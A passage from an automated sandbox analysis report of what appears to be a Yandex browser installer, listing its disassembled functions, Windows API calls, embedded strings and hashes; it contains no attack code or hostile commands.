                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: CreateFileVersionInfo error$GetCrypt32DllVersion$ScopedAllowBlockingForInstallUtil$crypt32.dll$yandex_trust_verifier_win.cc
                                                                                                                        • API String ID: 1452528299-962809236
                                                                                                                        • Opcode ID: 4c345e3693e5a624ae65999ae8b0ab35eb465f2c228f14948b51192ae7677898
                                                                                                                        • Instruction ID: 8f27c1ffcf9b9f1a95c62ef82947b6c44a24b6bced8c73c06a274363c651be50
                                                                                                                        • Opcode Fuzzy Hash: 4c345e3693e5a624ae65999ae8b0ab35eb465f2c228f14948b51192ae7677898
                                                                                                                        • Instruction Fuzzy Hash: 7821F5316443006BDB14FB299C93F6F7659EFC2B15F04091CF9529A2D2EF60A909CBA3
                                                                                                                        Function 0091C0EB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000001,0091C0E2,00901D94,00000011), ref: 0091C0F9
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0091C107
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0091C120
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0091C172
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 01fdd240f3b16317a4c9951b5fae7cdbf946e55f8f2563509fb84937e0e74605
                                                                                                                        • Instruction ID: 1f491e77228261ae2ff0e07fb5982569fce0d039b9d64496700dd4d1894e827f
                                                                                                                        • Opcode Fuzzy Hash: 01fdd240f3b16317a4c9951b5fae7cdbf946e55f8f2563509fb84937e0e74605
                                                                                                                        • Instruction Fuzzy Hash: 4D01F1723AD3256FAA212BB8BCC59AB2649EB817B9F300229F215950F6EF914C817140
                                                                                                                        Function 0089E950 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 285COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,?,?,SystemTemp,0000000A,?,00000000), ref: 0089EDBC
                                                                                                                        Strings
                                                                                                                        • CreateTemporaryDirInDir, xrefs: 0089E991
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089EC7C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089EC83
                                                                                                                        • file_util_win.cc, xrefs: 0089E98C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateTemporaryDirInDir$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-1011401140
                                                                                                                        • Opcode ID: 4b742a19777931d833fd83e1a72ca4b3929bab19e58558ef5804fb9fc66dc778
                                                                                                                        • Instruction ID: a3fdcd81b9701c9ff7709a963dfc3ce1598895e45b259d1cb6979321a4d98c17
                                                                                                                        • Opcode Fuzzy Hash: 4b742a19777931d833fd83e1a72ca4b3929bab19e58558ef5804fb9fc66dc778
                                                                                                                        • Instruction Fuzzy Hash: C4A1B2716083519BDB11EF24C881A6BBBE4FFD5718F08492DF5C5E3292DB20EA488793
                                                                                                                        Function 0085CCE0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 236COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(00000000,?,00000104,?,?,?,?,00944D18,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0085CE00
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0085CF54
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0085CF39
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0085CF40
                                                                                                                        • Application, xrefs: 0085CEC9, 0085CECE, 0085CEE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterEnvironmentInit_thread_headerLeaveVariable
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Application
                                                                                                                        • API String ID: 3061280413-3660936432
                                                                                                                        • Opcode ID: c965d2a2462104fc25f3711014d956309d9b8ebc27e4855b870021041866e66c
                                                                                                                        • Instruction ID: c6d490893663a9ea3cc0a815c89d6d8128119791b1c510c29c8a5e7ce05e4df2
                                                                                                                        • Opcode Fuzzy Hash: c965d2a2462104fc25f3711014d956309d9b8ebc27e4855b870021041866e66c
                                                                                                                        • Instruction Fuzzy Hash: 7871D670A003156FDB20AF58DC86ABEB7B5FF95705F444468EC09E7242DB70AE49CE92
                                                                                                                        Function 008F00A0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 217COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008F02D0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,-00000001,?,008F00C5,008CE3DD,?,-00000001,?,008CE3DD,CR_SOURCE_ROOT,0000000E), ref: 008F0303
                                                                                                                          • Part of subcall function 008F02D0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,-00000001), ref: 008F0362
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,?), ref: 008F01F7
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,00000000,?,?,?,?,?,?,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 008F0293
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:396: assertion __pos < size() failed: string_view[] index out of bounds, xrefs: 008F0176
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008F016F, 008F023C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008F0168, 008F0243
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:396: assertion __pos < size() failed: string_view[] index out of bounds
                                                                                                                        • API String ID: 1431749950-135494634
                                                                                                                        • Opcode ID: 3686a5ad33508cea450e2824b74e24053617c241f3ac280ea8a65520fd0d80b8
                                                                                                                        • Instruction ID: 861bcb014341e8691c5660329ebb136e6e03a64469f75a638ae23c29454d3aa1
                                                                                                                        • Opcode Fuzzy Hash: 3686a5ad33508cea450e2824b74e24053617c241f3ac280ea8a65520fd0d80b8
                                                                                                                        • Instruction Fuzzy Hash: 0751F171E0021D6FDF11ABB4CC45BBF7B64FF85324F088029EA45A7243D631AA55CBA2
                                                                                                                        Function 00868E80 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00834E50: _strlen.LIBCMT ref: 00834E60
                                                                                                                        • _strlen.LIBCMT ref: 00868EC7
                                                                                                                        Strings
                                                                                                                        • deflateEnd: , xrefs: 00869016
                                                                                                                        • http_body_gzip.cc, xrefs: 00869004
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00868F9D
                                                                                                                        • (%d), xrefs: 00868EA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: (%d)$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$deflateEnd: $http_body_gzip.cc
                                                                                                                        • API String ID: 4218353326-2874877394
                                                                                                                        • Opcode ID: 735e8439494f18939fe64418c81719253b7b9d05567f575de13ca0a3f37b5c8a
                                                                                                                        • Instruction ID: b504506e116284075791cd476faab6834946b30d1174d3233481ed25f2af67ed
                                                                                                                        • Opcode Fuzzy Hash: 735e8439494f18939fe64418c81719253b7b9d05567f575de13ca0a3f37b5c8a
                                                                                                                        • Instruction Fuzzy Hash: 62510971E002189BDF109B64DC41BEEB7B5FF99704F054269F549BB282EB316944CBA2
                                                                                                                        Function 0089E610 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 0089E7DD
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089E845
                                                                                                                        • CreateAndOpenTemporaryFileInDir, xrefs: 0089E654
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089E84C
                                                                                                                        • file_util_win.cc, xrefs: 0089E64F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateAndOpenTemporaryFileInDir$file_util_win.cc
                                                                                                                        • API String ID: 82841172-2017746051
                                                                                                                        • Opcode ID: 035d85998eef2e3b39e06ab060ab0ebb1e2848d80d7ea12a112828dd63319d1a
                                                                                                                        • Instruction ID: a7d223fc271bae86622f7a1b43a125cf17565394a3275c299d8a3bacf7880933
                                                                                                                        • Opcode Fuzzy Hash: 035d85998eef2e3b39e06ab060ab0ebb1e2848d80d7ea12a112828dd63319d1a
                                                                                                                        • Instruction Fuzzy Hash: F951D071A04345ABDB11FB24C856ABF7BA5FFD5704F08492DF985D7282EB30AA058783
                                                                                                                        Function 008AC870 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00966AD4,?,?,00000001,00000000,00000000,?,008D51BD,00000001,?), ref: 008AC900
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00966AD4,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000,?,008D51BD,00000001,?), ref: 008AC9B3
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008ACA38
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008AC9E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireInit_thread_headerRelease
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                                                                                        • API String ID: 1281622111-302938261
                                                                                                                        • Opcode ID: afa81497cc83a8034ce23d51751f134ea893b4d93157ef1f2b53a6e0e1f01235
                                                                                                                        • Instruction ID: 0c1f6609bb2aa08809a4baf936d3cbe3d3f7ba31cc384269179b87e92da98b6a
                                                                                                                        • Opcode Fuzzy Hash: afa81497cc83a8034ce23d51751f134ea893b4d93157ef1f2b53a6e0e1f01235
                                                                                                                        • Instruction Fuzzy Hash: A7512871E042299FDB10DFA8D882A6A77A1FF41714F184138E905F7681DB717D05DBA2
                                                                                                                        Function 008443C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$download-x32$download-x64
                                                                                                                        • API String ID: 4218353326-1121541715
                                                                                                                        • Opcode ID: 22e419b7e1577ae6d0b4e4da1001ade8f7bf57836b86ad5c2de70fd96c9d757e
                                                                                                                        • Instruction ID: d2cdcd079b6c1dc2d539ff1136ee4dd81d0f77ad89129d489718f22739f6e2cd
                                                                                                                        • Opcode Fuzzy Hash: 22e419b7e1577ae6d0b4e4da1001ade8f7bf57836b86ad5c2de70fd96c9d757e
                                                                                                                        • Instruction Fuzzy Hash: 954158B1E0521D5FCB20AEF4E896BAFB7A8FF40318F150439E901E7282E664590987D6
                                                                                                                        Function 0089E0F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 126fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileReplace
                                                                                                                        • String ID: ReplaceFileW$file_util_win.cc
                                                                                                                        • API String ID: 77091634-3250378775
                                                                                                                        • Opcode ID: 9178051a9fac6f5ffb2884befcaa123a452064a3fc1a80a96daf3b9af8547393
                                                                                                                        • Instruction ID: c3eda074c6e3f57887feb20f69e565e8df99a47ba9631e7b93a0bbaacd0898ae
                                                                                                                        • Opcode Fuzzy Hash: 9178051a9fac6f5ffb2884befcaa123a452064a3fc1a80a96daf3b9af8547393
                                                                                                                        • Instruction Fuzzy Hash: 1C41DAB1A007416FEB10EB38DC45B6B7B98FF95358F084629F899D7242FB30A94483D1
                                                                                                                        Function 0085A5F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • code, xrefs: 0085A664
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0085A699
                                                                                                                        • lite_install_failed, xrefs: 0085A60C, 0085A63B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0085A6A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$code$lite_install_failed
                                                                                                                        • API String ID: 0-4122915047
                                                                                                                        • Opcode ID: 60e8699d0eed3dadc253434fbfce7110570e199f38efbf9f89df767dd262bf97
                                                                                                                        • Instruction ID: 0c031cc1275596eb3dc0954769fa3fa954e7cb4439f0119fa7fa98e829a03156
                                                                                                                        • Opcode Fuzzy Hash: 60e8699d0eed3dadc253434fbfce7110570e199f38efbf9f89df767dd262bf97
                                                                                                                        • Instruction Fuzzy Hash: D721C0753046169B9B2C8E25C4E093677E5FEB174B31D4729EC06D3640E721FC9C9693
                                                                                                                        Function 0092E8D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryUnbiasedInterruptTime.KERNEL32(?,?,?,?,?,008404E0), ref: 0092E8F4
                                                                                                                        • __aulldiv.LIBCMT ref: 0092E915
                                                                                                                        • __aulldiv.LIBCMT ref: 0092E929
                                                                                                                        • __aullrem.LIBCMT ref: 0092E93F
                                                                                                                        Strings
